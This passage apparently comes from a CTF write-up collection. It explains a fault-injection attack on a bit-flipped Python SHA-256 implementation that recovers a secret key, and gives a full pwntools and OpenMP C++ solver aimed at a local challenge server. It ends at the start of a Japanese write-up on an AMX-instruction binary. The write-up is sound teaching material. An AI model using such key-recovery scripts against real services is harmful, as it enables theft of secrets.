    }
}
 
void search_key_6(std::vector<uint64_t> &kb) {
    bool found = false;
    #pragma omp parallel
    #pragma omp for collapse(3)
    forb (k0) forb (k1) forb (k2) {
        if (found) {
            #pragma omp cancel for
        }
        std::array<uint64_t, 16> key = {};
        key[0] = kb[0]<<24 | kb[1]<<16 | kb[2]<<8 | kb[3];
        key[1] = kb[1]<<48 | kb[2]<<40 | kb[3]<<32 | kb[4]<<24 | kb[5]<<16 | kb[6]<<8 | kb[7];
        key[2] = kb[5]<<48 | kb[6]<<40 | kb[7]<<32 | kb[8]<<24 | kb[9]<<16 | kb[10]<<8 | kb[11];
        key[3] = kb[9]<<48 | kb[10]<<40 | kb[11]<<32 | k0<<24 | k1<<16 | k2<<8 | kb[15];
        key[4] = kb[16]<<24 | kb[17]<<16 | kb[18]<<8 | kb[19];
        if (calc_sha256(key) == hash8) {
            found = true;
            std::cout << "#6 found" << std::endl;
            kb[12] = k0; kb[13] = k1; kb[14] = k2;
            #pragma omp cancel for
        }
        #pragma omp cancellation point for
    }
}
 
void search_key_7(std::vector<uint64_t> &kb) {
    bool found = false;
    #pragma omp parallel
    #pragma omp for collapse(4)
    forb (k0) forb (k1) forb (k2) forb (k3) {
        if (found) {
            #pragma omp cancel for
        }
        std::array<uint64_t, 16> key = {};
        key[0] = kb[0]<<24 | kb[1]<<16 | kb[2]<<8 | kb[3];
        key[1] = kb[4]<<24 | kb[5]<<16 | kb[6]<<8 | kb[7];
        key[2] = kb[8]<<24 | kb[9]<<16 | kb[10]<<8 | kb[11];
        key[3] = kb[12]<<24 | kb[13]<<16 | kb[14]<<8 | kb[15];
        key[4] = kb[16]<<24 | kb[17]<<16 | kb[18]<<8 | kb[19];
        key[5] = k0<<24 | k1<<16 | k2<<8 | k3;
        if (calc_sha256(key) == hash9) {
            found = true;
            std::cout << "#7 found" << std::endl;
            kb[20] = k0; kb[21] = k1; kb[22] = k2; kb[23] = k3;
            #pragma omp cancel for
        }
        #pragma omp cancellation point for
    }
}
 
void search_w8(std::array<uint64_t, 24> &known_keys) {
    bool found = false;
    #pragma omp parallel
    #pragma omp for collapse(4)
    forb (k0) forb (k1) forb (k2) forb (k3) {
        if (found) {
            #pragma omp cancel for
        }
        uint64_t w8 = k0<<24 | k1<<16 | k2<<8 | k3;
        uint64_t w7 = (known_keys[23] - sigma1(known_keys[21]) - known_keys[16] - sigma0(w8)) & 0xffffffff;
        uint64_t w6 = (known_keys[22] - sigma1(known_keys[20]) - known_keys[15] - sigma0(w7)) & 0xffffffff;
        uint64_t w5_check = (known_keys[21] - sigma1(known_keys[19]) - known_keys[14] - sigma0(w6)) & 0xffffffff;
        if (w5_check == known_keys[5]) {
            found = true;
            std::cout << "#8 found" << std::endl;
            known_keys[8] = w8;
            known_keys[7] = w7;
            known_keys[6] = w6;
            #pragma omp cancel for
        }
        #pragma omp cancellation point for
    }
}
 
int main() {
    read_hash(hash1);
    read_hash(hash2);
    read_hash(hash3);
    read_hash(hash4);
    read_hash(hash5);
    read_hash(hash6);
    read_hash(hash7);
    read_hash(hash8);
    read_hash(hash9);
 
    std::array<uint64_t, 24> known_keys = {};
    known_keys[14] = 0;
    known_keys[15] = 55 * 8;
 
    std::array<uint64_t, 8> h1 = hash1;
    std::array<uint64_t, 8> h2 = hash2;
    for (size_t i = 0; i < 8; i++) {
        h1[i] = (h1[i] - init_state[i]) & 0xffffffff;
        h2[i] = (h2[i] - init_state[i]) & 0xffffffff;
    }
    for (size_t t = 63; t >= 16; t--) {
        h1 = inv_round(h1, t, 0);
    }
    for (size_t t = 23; t >= 16; t--) {
        h2 = inv_round(h2, t, 0);
    }
    for (size_t t = 16; t < 24; t++) {
        h2 = round(h2, t, 0);
        uint64_t t2 = capsigma0(h1[0]) + maj(h1[0], h1[1], h1[2]);
        uint64_t t1 = h2[0] - t2;
        known_keys[t] = (t1 - (h1[7] + capsigma1(h1[4]) + ch(h1[4], h1[5], h1[6]) + K[t])) & 0xffffffff;
        h1 = round(h1, t, known_keys[t]);
    }
 
    std::vector<uint64_t> kb(24, 0);
    search_key_1(kb);
    search_key_2(kb);
    search_key_3(kb);
    search_key_4(kb);
    search_key_5(kb);
    search_key_6(kb);
    search_key_7(kb);
 
    known_keys[0] = kb[0]<<24 | kb[1]<<16 | kb[2]<<8 | kb[3];
    known_keys[1] = kb[4]<<24 | kb[5]<<16 | kb[6]<<8 | kb[7];
    known_keys[2] = kb[8]<<24 | kb[9]<<16 | kb[10]<<8 | kb[11];
    known_keys[3] = kb[12]<<24 | kb[13]<<16 | kb[14]<<8 | kb[15];
    known_keys[4] = kb[16]<<24 | kb[17]<<16 | kb[18]<<8 | kb[19];
    known_keys[5] = kb[20]<<24 | kb[21]<<16 | kb[22]<<8 | kb[23];
 
    for (size_t t = 9; t <= 13; t++) {
        known_keys[t] = (known_keys[t+7] - sigma1(known_keys[t+5]) - sigma0(known_keys[t-8]) - known_keys[t-9]) & 0xffffffff;
    }
 
    search_w8(known_keys);
 
    for (size_t t = 0; t < 24; t++) {
        std::cout << known_keys[t] << ",\n"[t==23];
    }
    return 0;
}

crypto

Faulty SHA (1 solve)

Challenge

The following server is given.

from random import Random
import inspect
import os
# https://github.com/keanemind/python-sha-256/blob/master/sha256.py
import sha256
 
flag = os.environ.get("FLAG", "tkbctf{dummy}")
key = Random(sha256.generate_hash(flag)).randbytes(55)
 
pos = int(input("pos: "))
source = bytearray(inspect.getsource(sha256), "utf-8")
source[pos // 8] ^= 1 << (pos % 8)
exec(bytes(source), sha256.__dict__)
 
print("hash:", sha256.generate_hash(key).hex())
if bytes.fromhex(input("key: ")) == key:
    print(flag)
else:
    print("wrong")

sha256.py is a SHA-256 implementation (keanemind/python-sha-256) published on GitHub. The sha256 module is overwritten with source code that has the bit specified by pos flipped, and the hash of key is returned. Since key = Random(SHA256(flag)).randbytes(55) is the same value no matter how many times you connect, by connecting multiple times and breaking different bits each time, you can collect information about key from different perspectives.

Solution

The solution consists of the following 4 steps.

Find the first 24 bytes of the input
Find message_schedule[16:24]
Find message_schedule[9:14]
Find message_schedule[6:9]

1. Identifying the first 24 bytes of the input

SHA-256's message schedule computation is as follows:

for t in range(0, 64):
    if t <= 15:
        message_schedule.append(bytes(message_block[t*4:(t*4)+4]))
    else:
        ...（expansion formula）

The 55-byte key padded becomes 64 bytes (= 1 block), and the first 16 elements of message_schedule (hereafter w) correspond to the 16 words of the message. Of these, w[14] = 0x00000000 and w[15] = 0x000001B8 (= $55 \times 8 = 440$ ) are fixed by padding.

We use the following 7 types of flips in sequence. Each flip causes the output to be computed using only some portion of the input, and since at most 4 new unknown bytes are introduced per step, each step can be identified by brute-forcing up to $2^{32}$ combinations while fixing the values already identified in previous steps. The values the hash output depends on are listed, with bold indicating values that were unknown before the immediately preceding step.

pos	line	change	dependencies
19362	61	`[t4:(t4)+4]` →`[t4:(t0)+4]`	key[0], key[1], key[2], key[3]
19321	61	`[t4:(t4)+4]` →`[t6:(t4)+4]`	key[0:4], key[6], key[7]
19320	61	`[t4:(t4)+4]` →`[t5:(t4)+4]`	key[0:4], key[5], key[6:8], key[10], key[11], key[15]
19352	61	`[t4:(t4)+4]` →`[t*4:(t+4)+4]`	key[0:4], key[4], key[5:8], key[8], key[9]
26438	87	`message_schedule[t]` →`message_schedule[4]`	key[16], key[17], key[18], key[19]
19326	61	`[t4:(t4)+4]` →`[tt:(t4)+4]`	key[0:12], key[12], key[13], key[14], key[15:20]
14634	40	`blocks.append(message[i:i+64])` →`blocks.append(message[i:i+24])`	key[0:20], key[20], key[21], key[22], key[23]

From the above, key[0:24] (the first 6 words of the schedule w[0:6]) is obtained.

These 7 types of flips can be found by manual puzzle-solving, but you can also try all bit positions (about 32000) and filter down to those that execute without error and modify something other than constant sections (the K array and initial hash values) (about 500 remaining). For each position, changing the input 1 byte at a time lets you inspect which output bytes depend on it, enabling exhaustive discovery of useful positions.

2. Finding `message_schedule[16:24]`

The TODO part is as follows:

# Iterate for t=0 to 63
for t in range(64):
    t1 = ((h + _capsigma1(e) + _ch(e, f, g) + K[t] +
            int.from_bytes(message_schedule[t], 'big')) % 2**32)
 
    t2 = (_capsigma0(a) + _maj(a, b, c)) % 2**32
 
    h = g
    g = f
    f = e
    e = (d + t1) % 2**32
    d = c
    c = b
    b = a
    a = (t1 + t2) % 2**32

We write the tuple of variables $[a,b,c,d,e,f,g,h]$ after round $t$ as $S_t$ .

An important point: if w[t] is known, the round function can be computed in reverse as follows:

def inv_round(s, t, w):
    a_new, a, b, c, e_new, e, f, g = s
    t2 = (capsigma0(a) + maj(a, b, c)) % MOD
    t1 = (a_new - t2) % MOD
    d = (e_new - t1) % MOD
    h = (t1 - capsigma1(e) - ch(e, f, g) - K[t] - w) % MOD
    return [a, b, c, d, e, f, g, h]

To find w[16:24], we use the results of the following 2 types of flips.

pos=17675 (line 57, if t <= 15: → if t <= 95:)
Since $t$ in the schedule computation loop is at most 63, t <= 95 is always true. For $t \geq 16$ , message_block[t*4:(t*4)+4] becomes an empty slice, so w[16] and beyond are all 0.
pos=25498 (line 85, for t in range(64): → for t in range(24):)
The schedule preparation loop is unchanged, so w[0:64] is computed normally, but the hash computation loop terminates after 24 rounds.

Applying inv_round(s, t, 0) backwards from $t=63$ to $t=16$ (48 times) to the first output minus init_state gives $S_{15}$ .

Subtracting init_state from the second output gives $S_{23}$ .

Extracting w[16:24]

Apply inv_round(s, t, 0) to $S_{23}$ from $t=23$ down to $t=16$ (8 times).

Looking at where each component of inv_round's output comes from:

a, b, c: from input s[1], s[2], s[3]
e, f, g: from input s[5], s[6], s[7]
d: s[4] - t1 (depends on s[0], s[1], s[2], s[3], s[5])
h: t1 - capsigma1(e) - ch(e, f, g) - K[t] - w (depends on s[0:4], s[5:8] and w)

So computing $S_{22}$ with the incorrect value w=0, the first 7 components of the output are correct but only h is wrong. In the next computation of $S_{21}$ , the wrong h is used and the error propagates to g. This repeats, giving correct values (marked o) in the positions below:

     a b c d e f g h
15 | o o o o o o o o <- S_15
16 | o
17 | o o
18 | o o o
19 | o o o o
20 | o o o o o        ^
21 | o o o o o o      |
22 | o o o o o o o    |
23 | o o o o o o o o <- S_23

a has correct values in all rounds.

Knowing $a_{t+1}$ and $S_t$ allows computing $t1_t, t2_t$ , and further $S_{t+1}$ and w[t+1] as follows:

def advance(S, a_next, t):
    a, b, c, d, e, f, g, h = S
    t2 = (capsigma0(a) + maj(a, b, c)) % MOD
    t1 = (a_next - t2) % MOD
    e_next = (d + t1) % MOD
    S_next = [a_next, a, b, c, e_next, e, f, g]
    w = (t1 - h - capsigma1(e) - ch(e, f, g) - K[t+1]) % MOD
    return S_next, w

In summary, starting from $a_t$ ( $t = 16, \ldots, 23$ ) and $S_{15}$ , calling advance for $t = 15, 16, \ldots, 22$ in order yields w[16:24].

3. Finding $w[9:14]$

Summarizing the information obtained so far:

w[0:6]: from key[0:24] obtained in step 1
w[14] = 0, w[15] = 440: fixed padding values
w[16:24]: recovered in step 2

Solve the SHA-256 schedule expansion formula $w[t] = \sigma_1(w[t-2]) + w[t-7] + \sigma_0(w[t-15]) + w[t-16]$ for each unknown.

Solving for $w[t-7]$ :

$w[t-7] = w[t] - \sigma_1(w[t-2]) - \sigma_0(w[t-15]) - w[t-16]$

Substituting $t = 16, 17, 18, 19, 20$ gives $w[9], w[10], w[11], w[12], w[13]$ respectively, each computed in sequence from known values only.

4. Finding $w[6:9]$

Solving for $w[t-16]$ :

$w[t-16] = w[t] - \sigma_1(w[t-2]) - w[t-7] - \sigma_0(w[t-15])$

Brute-force all $2^{32}$ candidates for w[8], and for each candidate compute:

$t = 23$ : $w[7] = w[23] - \sigma_1(w[21]) - w[16] - \sigma_0(w[8])$
$t = 22$ : $w[6] = w[22] - \sigma_1(w[20]) - w[15] - \sigma_0(w[7])$
Verify at $t = 21$ : $w[5] \stackrel{?}{=} w[21] - \sigma_1(w[19]) - w[14] - \sigma_0(w[6])$

The candidate that passes verification is the correct $w[8]$ , and $w[6], w[7]$ are obtained simultaneously.

This gives us w[0:14], and concatenating the leading 3 bytes of each from w[0] to w[13] gives the 55-byte key, from which the flag can be obtained.

Since multiple $2^{32}$ brute-force searches are required, the implementation should be done in a fast language like C++ rather than Python. Delegating this to AI is a good idea. The solver is as follows.

Solver Python part (click to expand)

import sys
from pwn import *
import ast
from Crypto.Util.number import long_to_bytes
 
def state2bytes(state):
    return b"".join([v.to_bytes(4, "big") for v in state])
 
def bytes2state(b):
    return [int.from_bytes(b[i*4:i*4+4], "big") for i in range(8)]
 
def oracle(idx):
    with remote("localhost", 1337) as sc:
        sc.sendlineafter(b"pos: ", str(idx).encode())
        sc.recvuntil(b"hash: ")
        hash = bytes2state(bytes.fromhex(sc.recvline().decode()))
        return hash
 
import sha256
import inspect
 
source = bytearray(inspect.getsource(sha256), "utf-8")
 
hash1 = oracle(source.index(b"if t <= 15") * 8 + 67)  # if t <= 95:
hash2 = oracle(source.index(b"range(64)") * 8 + 50)   # range(24)
hash3 = oracle(source.index(b"[t*4:(t*4)+4]") * 8 + 66)  # [t*4:(t*0)+4]
hash4 = oracle(source.index(b"[t*4:(t*4)+4]") * 8 + 25)  # [t*6:(t*4)+4]
hash5 = oracle(source.index(b"[t*4:(t*4)+4]") * 8 + 24)  # [t*5:(t*4)+4]
hash6 = oracle(source.index(b"[t*4:(t*4)+4]") * 8 + 56)  # [t*4:(t+4)+4]
hash7 = oracle(source.index(b"message_schedule[t]") * 8 + 142)  # message_schedule[4]
hash8 = oracle(source.index(b"[t*4:(t*4)+4]") * 8 + 30)  # [t*t:(t*4)+4]
hash9 = oracle(source.index(b"message[i:i+64]") * 8 + 98)  # message[i:i+24]
 
sol = process(["./solver2"], env={"OMP_CANCELLATION": "TRUE"})
sol.sendline(" ".join(map(str, hash1)).encode())
sol.sendline(" ".join(map(str, hash2)).encode())
sol.sendline(" ".join(map(str, hash3)).encode())
sol.sendline(" ".join(map(str, hash4)).encode())
sol.sendline(" ".join(map(str, hash5)).encode())
sol.sendline(" ".join(map(str, hash6)).encode())
sol.sendline(" ".join(map(str, hash7)).encode())
sol.sendline(" ".join(map(str, hash8)).encode())
sol.sendline(" ".join(map(str, hash9)).encode())
 
for _ in range(8):
    print(sol.recvline())
 
key = ast.literal_eval(sol.recvline().decode())
key = b"".join([long_to_bytes(v, 4) for v in key])[:-1][:55]
 
print(key.hex())
 
with remote("localhost", 1337) as sc:
    sc.sendlineafter(b"pos: ", str(source.index(b"#") * 8 + 8).encode())
    sc.recvuntil(b"hash: ")
    hash = bytes2state(bytes.fromhex(sc.recvline().decode()))
    sc.recvuntil(b"key: ")
    sc.sendline(key.hex())
    print(sc.recvline())

Solver C++ part (click to expand)

#include <iostream>
#include <vector>
#include <array>
#include <cstdint>
#include <string>
#include <algorithm>
#include <omp.h>
 
#define forb(k) for (uint64_t k = 0; k < 256; k++)
 
const std::array<uint64_t, 64> K = {
    0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5,
    0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174,
    0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da,
    0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967,
    0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85,
    0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070,
    0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3,
    0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2
};
 
const std::array<uint64_t, 8> init_state = { 0x6a09e667, 0xbb67ae85, 0x3c6ef372, 0xa54ff53a, 0x510e527f, 0x9b05688c, 0x1f83d9ab, 0x5be0cd19 };
 
std::array<uint64_t, 8> hash1{};
std::array<uint64_t, 8> hash2{};
std::array<uint64_t, 8> hash3{};
std::array<uint64_t, 8> hash4{};
std::array<uint64_t, 8> hash5{};
std::array<uint64_t, 8> hash6{};
std::array<uint64_t, 8> hash7{};
std::array<uint64_t, 8> hash8{};
std::array<uint64_t, 8> hash9{};
 
void read_hash(std::array<uint64_t, 8> &hash) {
    for (auto &value : hash) {
        std::cin >> value;
    }
}
 
inline uint64_t rotate_right(uint64_t value, uint64_t shift) {
    return (value >> shift) | (value << (32 - shift));
}
inline uint64_t sigma0(uint64_t x) {
    return rotate_right(x, 7) ^ rotate_right(x, 18) ^ (x >> 3);
}
inline uint64_t sigma1(uint64_t x) {
    return rotate_right(x, 17) ^ rotate_right(x, 19) ^ (x >> 10);
}
inline uint64_t capsigma0(uint64_t x) {
    return rotate_right(x, 2) ^ rotate_right(x, 13) ^ rotate_right(x, 22);
}
inline uint64_t capsigma1(uint64_t x) {
    return rotate_right(x, 6) ^ rotate_right(x, 11) ^ rotate_right(x, 25);
}
inline uint64_t ch(uint64_t x, uint64_t y, uint64_t z) {
    return (x & y) ^ (~x & z);
}
inline uint64_t maj(uint64_t x, uint64_t y, uint64_t z) {
    return (x & y) ^ (x & z) ^ (y & z);
}
 
inline std::array<uint64_t, 8> round(const std::array<uint64_t, 8> &state, size_t t, uint64_t msg) {
    uint64_t a = state[0], b = state[1], c = state[2], d = state[3];
    uint64_t e = state[4], f = state[5], g = state[6], h = state[7];
    uint64_t t1 = h + capsigma1(e) + ch(e, f, g) + K[t] + msg;
    uint64_t t2 = capsigma0(a) + maj(a, b, c);
    return { (t1 + t2) & 0xffffffff, a, b, c, (d + t1) & 0xffffffff, e, f, g };
}
 
inline std::array<uint64_t, 8> inv_round(const std::array<uint64_t, 8> &state, size_t t, uint64_t msg) {
    uint64_t a = state[0], b = state[1], c = state[2], d = state[3];
    uint64_t e = state[4], f = state[5], g = state[6], h = state[7];
    uint64_t t2 = capsigma0(b) + maj(b, c, d);
    uint64_t t1 = a - t2;
    return { b, c, d, (e - t1) & 0xffffffff, f, g, h, (t1 - capsigma1(f) - ch(f, g, h) - K[t] - msg) & 0xffffffff };
}
 
template <size_t N>
inline void extend_schedule(const std::array<uint64_t, N> &initial, std::array<uint64_t, 64> &schedule) {
    static_assert(N <= 64);
    for (size_t i = 0; i < N; i++) {
        schedule[i] = initial[i];
    }
    for (size_t t = N; t < 64; t++) {
        uint64_t value = sigma1(schedule[t-2]) + schedule[t-7] + sigma0(schedule[t-15]) + schedule[t-16];
        schedule[t] = value & 0xffffffff;
    }
}
 
template <size_t N>
std::array<uint64_t, 8> calc_sha256(const std::array<uint64_t, N> &key) {
    std::array<uint64_t, 64> schedule {};
    extend_schedule(key, schedule);
    std::array<uint64_t, 8> state = init_state;
    for (size_t t = 0; t < 64; t++) {
        state = round(state, t, schedule[t]);
    }
    for (size_t i = 0; i < 8; i++) {
        state[i] = (state[i] + init_state[i]) & 0xffffffff;
    }
    return state;
}
 
void search_key_1(std::vector<uint64_t> &kb) {
    bool found = false;
    #pragma omp parallel
    #pragma omp for collapse(4)
    forb (k0) forb (k1) forb (k2) forb (k3) {
        if (found) {
            #pragma omp cancel for
        }
        std::array<uint64_t, 16> key = {};
        key[0] = k0<<24 | k1<<16 | k2<<8 | k3;
        if (calc_sha256(key) == hash3) {
            found = true;
            std::cout << "#1 found" << std::endl;
            kb[0] = k0; kb[1] = k1; kb[2] = k2; kb[3] = k3;
            #pragma omp cancel for
        }
        #pragma omp cancellation point for
    }
}
 
void search_key_2(std::vector<uint64_t> &kb) {
    bool found = false;
    #pragma omp parallel
    #pragma omp for collapse(2)
    forb (k0) forb (k1) {
        if (found) {
            #pragma omp cancel for
        }
        std::array<uint64_t, 16> key = {};
        key[0] = kb[0]<<24 | kb[1]<<16 | kb[2]<<8 | kb[3];
        key[1] = k0<<8 | k1;
        if (calc_sha256(key) == hash4) {
            found = true;
            std::cout << "#2 found" << std::endl;
            kb[6] = k0; kb[7] = k1;
            #pragma omp cancel for
        }
        #pragma omp cancellation point for
    }
}
 
void search_key_3(std::vector<uint64_t> &kb) {
    bool found = false;
    #pragma omp parallel
    #pragma omp for collapse(4)
    forb (k0) forb (k1) forb (k2) forb (k3) {
        if (found) {
            #pragma omp cancel for
        }
        std::array<uint64_t, 16> key = {};
        key[0] = kb[0]<<24 | kb[1]<<16 | kb[2]<<8 | kb[3];
        key[1] = k0<<16 | kb[6]<<8 | kb[7];
        key[2] = k1<<8 | k2;
        key[3] = k3;
        if (calc_sha256(key) == hash5) {
            found = true;
            std::cout << "#3 found" << std::endl;
            kb[5] = k0; kb[10] = k1; kb[11] = k2; kb[15] = k3;
            #pragma omp cancel for
        }
        #pragma omp cancellation point for
    }
}
 
void search_key_4(std::vector<uint64_t> &kb) {
    bool found = false;
    #pragma omp parallel
    #pragma omp for collapse(3)
    forb (k0) forb (k1) forb (k2) {
        if (found) {
            #pragma omp cancel for
        }
        std::array<uint64_t, 16> key = {};
        key[0] = kb[0]<<56 | kb[1]<<48 | kb[2]<<40 | kb[3]<<32 | k0<<24 | kb[5]<<16 | kb[6]<<8 | kb[7];
        key[1] = k0<<32 | kb[5]<<24 | kb[6]<<16 | kb[7]<<8 | k1;
        key[2] = k1<<8 | k2;
        if (calc_sha256(key) == hash6) {
            found = true;
            std::cout << "#4 found" << std::endl;
            kb[4] = k0; kb[8] = k1; kb[9] = k2;
            #pragma omp cancel for
        }
        #pragma omp cancellation point for
    }
}
 
void search_key_5(std::vector<uint64_t> &kb) {
    bool found = false;
    #pragma omp parallel
    #pragma omp for collapse(4)
    forb (k0) forb (k1) forb (k2) forb (k3) {
        if (found) {
            #pragma omp cancel for
        }
        std::array<uint64_t, 64> key;
        key.fill(k0<<24 | k1<<16 | k2<<8 | k3);
        if (calc_sha256(key) == hash7) {
            found = true;
            std::cout << "#5 found" << std::endl;
            kb[16] = k0; kb[17] = k1; kb[18] = k2; kb[19] = k3;
            #pragma omp cancel for
        }
        #pragma omp cancellation point for
    }
}
 
void search_key_6(std::vector<uint64_t> &kb) {
    bool found = false;
    #pragma omp parallel
    #pragma omp for collapse(3)
    forb (k0) forb (k1) forb (k2) {
        if (found) {
            #pragma omp cancel for
        }
        std::array<uint64_t, 16> key = {};
        key[0] = kb[0]<<24 | kb[1]<<16 | kb[2]<<8 | kb[3];
        key[1] = kb[1]<<48 | kb[2]<<40 | kb[3]<<32 | kb[4]<<24 | kb[5]<<16 | kb[6]<<8 | kb[7];
        key[2] = kb[5]<<48 | kb[6]<<40 | kb[7]<<32 | kb[8]<<24 | kb[9]<<16 | kb[10]<<8 | kb[11];
        key[3] = kb[9]<<48 | kb[10]<<40 | kb[11]<<32 | k0<<24 | k1<<16 | k2<<8 | kb[15];
        key[4] = kb[16]<<24 | kb[17]<<16 | kb[18]<<8 | kb[19];
        if (calc_sha256(key) == hash8) {
            found = true;
            std::cout << "#6 found" << std::endl;
            kb[12] = k0; kb[13] = k1; kb[14] = k2;
            #pragma omp cancel for
        }
        #pragma omp cancellation point for
    }
}
 
void search_key_7(std::vector<uint64_t> &kb) {
    bool found = false;
    #pragma omp parallel
    #pragma omp for collapse(4)
    forb (k0) forb (k1) forb (k2) forb (k3) {
        if (found) {
            #pragma omp cancel for
        }
        std::array<uint64_t, 16> key = {};
        key[0] = kb[0]<<24 | kb[1]<<16 | kb[2]<<8 | kb[3];
        key[1] = kb[4]<<24 | kb[5]<<16 | kb[6]<<8 | kb[7];
        key[2] = kb[8]<<24 | kb[9]<<16 | kb[10]<<8 | kb[11];
        key[3] = kb[12]<<24 | kb[13]<<16 | kb[14]<<8 | kb[15];
        key[4] = kb[16]<<24 | kb[17]<<16 | kb[18]<<8 | kb[19];
        key[5] = k0<<24 | k1<<16 | k2<<8 | k3;
        if (calc_sha256(key) == hash9) {
            found = true;
            std::cout << "#7 found" << std::endl;
            kb[20] = k0; kb[21] = k1; kb[22] = k2; kb[23] = k3;
            #pragma omp cancel for
        }
        #pragma omp cancellation point for
    }
}
 
void search_w8(std::array<uint64_t, 24> &known_keys) {
    bool found = false;
    #pragma omp parallel
    #pragma omp for collapse(4)
    forb (k0) forb (k1) forb (k2) forb (k3) {
        if (found) {
            #pragma omp cancel for
        }
        uint64_t w8 = k0<<24 | k1<<16 | k2<<8 | k3;
        uint64_t w7 = (known_keys[23] - sigma1(known_keys[21]) - known_keys[16] - sigma0(w8)) & 0xffffffff;
        uint64_t w6 = (known_keys[22] - sigma1(known_keys[20]) - known_keys[15] - sigma0(w7)) & 0xffffffff;
        uint64_t w5_check = (known_keys[21] - sigma1(known_keys[19]) - known_keys[14] - sigma0(w6)) & 0xffffffff;
        if (w5_check == known_keys[5]) {
            found = true;
            std::cout << "#8 found" << std::endl;
            known_keys[8] = w8;
            known_keys[7] = w7;
            known_keys[6] = w6;
            #pragma omp cancel for
        }
        #pragma omp cancellation point for
    }
}
 
int main() {
    read_hash(hash1);
    read_hash(hash2);
    read_hash(hash3);
    read_hash(hash4);
    read_hash(hash5);
    read_hash(hash6);
    read_hash(hash7);
    read_hash(hash8);
    read_hash(hash9);
 
    std::array<uint64_t, 24> known_keys = {};
    known_keys[14] = 0;
    known_keys[15] = 55 * 8;
 
    std::array<uint64_t, 8> h1 = hash1;
    std::array<uint64_t, 8> h2 = hash2;
    for (size_t i = 0; i < 8; i++) {
        h1[i] = (h1[i] - init_state[i]) & 0xffffffff;
        h2[i] = (h2[i] - init_state[i]) & 0xffffffff;
    }
    for (size_t t = 63; t >= 16; t--) {
        h1 = inv_round(h1, t, 0);
    }
    for (size_t t = 23; t >= 16; t--) {
        h2 = inv_round(h2, t, 0);
    }
    for (size_t t = 16; t < 24; t++) {
        h2 = round(h2, t, 0);
        uint64_t t2 = capsigma0(h1[0]) + maj(h1[0], h1[1], h1[2]);
        uint64_t t1 = h2[0] - t2;
        known_keys[t] = (t1 - (h1[7] + capsigma1(h1[4]) + ch(h1[4], h1[5], h1[6]) + K[t])) & 0xffffffff;
        h1 = round(h1, t, known_keys[t]);
    }
 
    std::vector<uint64_t> kb(24, 0);
    search_key_1(kb);
    search_key_2(kb);
    search_key_3(kb);
    search_key_4(kb);
    search_key_5(kb);
    search_key_6(kb);
    search_key_7(kb);
 
    known_keys[0] = kb[0]<<24 | kb[1]<<16 | kb[2]<<8 | kb[3];
    known_keys[1] = kb[4]<<24 | kb[5]<<16 | kb[6]<<8 | kb[7];
    known_keys[2] = kb[8]<<24 | kb[9]<<16 | kb[10]<<8 | kb[11];
    known_keys[3] = kb[12]<<24 | kb[13]<<16 | kb[14]<<8 | kb[15];
    known_keys[4] = kb[16]<<24 | kb[17]<<16 | kb[18]<<8 | kb[19];
    known_keys[5] = kb[20]<<24 | kb[21]<<16 | kb[22]<<8 | kb[23];
 
    for (size_t t = 9; t <= 13; t++) {
        known_keys[t] = (known_keys[t+7] - sigma1(known_keys[t+5]) - sigma0(known_keys[t-8]) - known_keys[t-9]) & 0xffffffff;
    }
 
    search_w8(known_keys);
 
    for (size_t t = 0; t < 24; t++) {
        std::cout << known_keys[t] << ",\n"[t==23];
    }
    return 0;
}

rev

BINARY IN THE FUTURE. (64 solves)

問題

配布されたのは実行バイナリのみです。実行すると 48 文字の入力を受け取り、内部で変換を 100000 回繰り返した結果が一致すれば tkbctf{入力} を出力します。

解法

配布されたバイナリをデコンパイルしてみると、多くのデコンパイラではエラーが出るはずです。 Binary Ninjaでは__ldtilecfg_memや__tdpbuud_tmmu32_tmm4u8_tmm4u8といった命令が確認できますが、それ以降の命令でデコンパイルに失敗します。また、普通に実行してみるとYour environment is too old for this binary!と出力されて終了してしまいます。配布されたDockerfileではsde64 -future -- /app/binary-in-the-futureと実行しています。このことから、このバイナリは将来のCPU向けにコンパイルされており、現在の環境ではそのまま実行できないことがわかります。

objdumpでdisassembleするとtilemovrow %eax,%tmm5,%zmm0やtdpbuud %tmm1,%tmm0,%tmm4といった見慣れない命令が確認できます。これらはIntelのAMX命令です。 AMXは2021年に発表された新しい命令セットで、Xeonなどの一部のCPUでしかサポートされていません。中でもtilemovrow命令などのAMX-AVX512命令セットはDiamond Rapids以降のCPUでのみサポートされる予定であり、2026年3月現在ではリリースされたCPUのサポートはありません。 GCCやobjdumpは既にこれらの命令をサポートしていますが、多くのデコンパイラはまだサポートしていないため、デコンパイルに失敗してしまいます。

AMX命令については以下の記事が参考になります。（実は、これは私がインターンしたときに書いた記事です）

https://zenn.dev/fixstars/articles/amx-introduction

コンパイル前のコードは以下のようになっていました。

コンパイル前のコード（クリックで展開）

 
#include <immintrin.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <cstring>
 
#define ARCH_REQ_XCOMP_PERM 0x1023
#define XFEATURE_XTILEDATA  18
 
typedef struct tileconfig_t {
    uint8_t  palette_id;
    uint8_t  startRow;
    uint8_t  reserved[14];
    uint16_t colb[16];
    uint8_t  rows[16];
} tileconfig_t;
 
const uint8_t mat[2304] = {
    0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
